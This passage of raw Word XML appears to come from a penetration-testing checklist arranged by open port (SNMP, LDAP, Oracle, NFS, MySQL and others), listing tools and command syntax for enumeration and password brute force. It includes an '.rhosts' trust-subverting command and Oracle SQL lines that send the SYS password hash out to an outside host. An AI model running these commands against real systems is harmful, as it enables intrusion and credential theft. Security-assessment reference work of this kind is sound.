      </w:r>
    </w:p>
    <w:p w14:paraId="4D871E6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Solarwinds MIB walk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53A6562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Getif</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F43A58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snmpwalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51320EF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snmpwalk -v &lt;Version&gt; -c &lt;Community string&gt; &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874512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Snscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7159121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Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0117D18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ZyXel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CED5EF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snmpget -v2c -c &lt;Community String&gt; &lt;IP&gt; 1.3.6.1.4.1.890.1.2.1.2.6.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1DEC8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snmpwalk -v2c -c &lt;Community String&gt; &lt;IP&gt; 1.3.6.1.4.1.890.1.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFC8365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 Bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549AF0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onesixtyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC8AC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onesixytone -c SNMP.wordlist &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4584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cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB2B7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./cat -h &lt;IP&gt; -w SNMP.wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EED98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Solarwinds SNMP Brute Force</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="411D035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9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ADMsnmp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1114EF07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SNMP Configuration files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22A6A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snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60169B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snmpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20500C2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snmp-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF17D3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3" w:name="_Toc96705551"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>LDAP Port 389 Open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2471C375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 enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64361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ldapminer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E7D1C3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ldapminer -h ip_address -p port (not required if default) -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFC1A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luma</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21A5A19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Gui based tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A355AB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ldp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BE74E5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Gui based tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B64517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openldap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52854E2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ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1352D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ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D7F1D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ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E224D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ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB695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ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F56C19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 brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3640E31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bf_ldap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72547AF6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bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE2382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K0ldS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09A4FAB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LDAP_Brute.pl</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1931D7DB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28329C9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General</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE10E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containers.ldif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CAD1F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ldap.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5FA7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ldap.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5E21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ldap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7EB3A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ldap-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE720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ldap-realm.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2902A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slapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4658B789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IBM SecureWay V3 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485D2F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V3.sas.oc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA4F0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Microsoft Active Directory server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B6937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msadClassesAttrs.ldif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44007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Netscape Directory Server 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D3A775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nsslapd.sas_at.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC0A7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nsslapd.sas_oc.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB7F8F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OpenLDAP directory server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19472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slapd.sas_at.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA569D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slapd.sas_oc.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0869A38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Sun ONE Directory Server 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3010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75sas.ldif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B4FF9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4" w:name="_Toc96705552"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PPTP/L2TP/VPN port 500/1723 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4377C28C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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F4C7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ike-scan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CD4BE9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ike-probe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28A015B3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Brute-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D3704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0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ike-crack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18E456C4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Reference Material</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE16D8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PSK cracking paper</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0533A319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SecurityFocus Infocus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29049B66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Scanning a VPN Implementation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30CA5D11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5" w:name="_Toc96705553"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Modbus port 502 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5E6113D0" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="00AE180D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modscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D420D12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6" w:name="_Toc96705554"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rlogin port 513 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="79FC44B3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Rlogin Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE48D1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Find the files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404EA1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find / -name .rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B956C8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locate .rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71D17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Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D61ED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cat .rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822949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Manual Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA65D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rlogin hostname -l username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01123A9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rlogin &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F210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Subvert the files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383F14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echo ++ &gt; .rhosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBACEF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Rlogin Brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB62C49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Hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56CDAFBB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7" w:name="_Toc96705555"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rsh port 514 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2BDB7027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Rsh Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A4C21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rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F75E2A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Rsh Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E4326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rsh-grind</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D6D3A6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Hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02677897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medusa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5689D82D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8" w:name="_Toc96705556"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server Port 1433 1434 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="01370D59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 Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807AF07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piggy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19D27304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1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SQLPing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39932CB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sqlping ip_address/hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27D85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SQLPing2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39A2D28D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SQLPing3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3674425D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SQLpoke</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2522CD24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 Recon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4324B25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SQLver</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71DBCD9C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 Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186BD77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SQLPAT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C363C4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sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2A11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sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADBE087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 Dict</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="504172B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SQLAT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79DA778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Hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D282D7D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2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SQLlhf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1965FE2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ForceSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78D34380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19" w:name="_Toc96705557"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Citrix port 1494 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="5BD18DF1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Citrix Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F4DE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Default Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449CCB0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Published Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26584F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./citrix-pa-scan {IP_address/file | - | random} [timeout]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3016BD72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citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="736E83B8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Citrix Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C02AB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bforce.js</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7433BEDD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connect.js</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="002E2564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Citrix Brute-forcer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="055D1F9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Reference Material</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60925294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Hacking Citrix - the legitimate backdoor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6876D4BC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Hacking Citrix - the forceful way</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31CC299B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0" w:name="_Toc96705558"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Oracle Port 1521 Open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0064FC13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Oracle Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27136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oracsec</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F215B7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3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Repscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DBE0FA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Sidguess</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F6AB74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Scuba</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C06218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DNS/HTTP Enumeration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3241A9E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SQL&gt; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20366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SQL&gt; select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2B57A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WinSID</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2088D06E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Oracle default password list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BB0CDE6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TNSVer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08D7C46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tnsver host [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589660B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TCP Scan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C08EFED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Oracle TNSLSNR</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DE9075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Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBE0A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TNSCmd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B7597F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tnscmd.pl -h ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954CFC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tnscmd.pl version -h ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2E8D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tnscmd.pl status -h ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B761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perl tnscmd.pl -h ip_address --cmdsize (40 - 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F39F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4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LSNrCheck</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="712F5CC5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Oracle Security Check (needs credentials)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4106D99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OAT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3ED56E0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sh opwg.sh -s ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA36D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opwg.bat -s ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047AAF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sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3876375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OScanner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A36099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sh oscanner.sh -s ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B429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oscanner.exe -s ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED69F6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sh reportviewer.sh oscanner_saved_file.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE18B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reportviewer.exe oscanner_saved_file.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F63C2E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NGS Squirrel for Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="786F908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Service Register</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B090A8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Service-register.exe ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E685F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PLSQL Scanner 2008</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AAEE865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Oracle Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131627F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OAK</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5408B85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ora-getsid hostname port sid_dictionary_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D952B4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ora-auth-alter-session host port sid username password sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB750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ora-brutesid host port start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4723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ora-pwdbrute host port sid username password-file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E936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ora-userenum host port sid userlistfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBAA89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ora-ver -e (-f -l -a) host port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1B91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breakable (Targets Application Server Port)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4885745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breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CD7CD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SQLInjector (Targets Application Server Port)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="603BC76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sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EBA0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sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D145E8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5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Check Password</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="117C8C1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orabf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7215FBE1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orabf [hash]:[username] [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CDE2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thc-orakel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B942C8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Cracker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7C27A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Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09328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Crypto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3C28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DBVisualisor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47A98C87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 scripts from pentest.co.uk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E8103B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Manual sql input of previously reported vulnerabilties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46775F50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Oracle Reference Material</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C905AE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4" w:anchor="search=%22hardik%20shah%20sql%20injection%2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Understanding SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78FB22E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 Injection walkthrough</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55770EE6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SQL Injection by example</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="538367B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Advanced SQL Injection in Oracle databases</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="732DDED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Blind SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41CAF3BD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 Cheatsheets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F56976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http://ha.ckers.org/sqlinjection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB9880" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880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http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29764F07" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880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http://www.0x000000.com/?i=14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC281EE" w14:textId="77777777" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880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http://pentestmonkey.net/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FF5EC0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1" w:name="_Toc96705559"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NFS Port 2049 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="29E2DD0B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NFS Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46BB0B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showmount -e hostname/ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782A33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mount -t nfs ip_address:/directory_found_exported /local_mount_point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC1F2A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NFS Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104723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Interact with NFS share and try to add/delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E674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6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Exploit and Confuse Unix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01ED94BF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1270177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/etc/exports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140ECE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/etc/lib/nfs/xtab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CE0F85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2" w:name="_Toc96705560"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Compaq/HP Insight Manager Port 2301,2381open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="16364FD7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HP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA19B8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Authentication Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7B11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Host OS Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B21B5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Default Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CFE432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Default Passwords</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C723B37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Wikto</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="355679E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Nstealth</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51908E34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HP Bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC4C9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Hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A020AD4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Acunetix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B662AAC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1980098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path.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9B85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mx.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A219B9B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CLIClientConfig.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465B2D0D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database.props</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC17D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pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408BCEA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jboss-service.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83A8F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.namazurc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF5224F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3" w:name="_Toc96705561"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MySQL port 3306 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="7631F4BB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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586A76F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nmap -A -n -p3306 &lt;IP Address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2571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nmap -A -n -PN --script:ALL -p3306 &lt;IP Address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564F53D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telnet IP_Address 3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D20E8BF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use test; select * from test;</w:t>
      </w:r>
    </w:p>
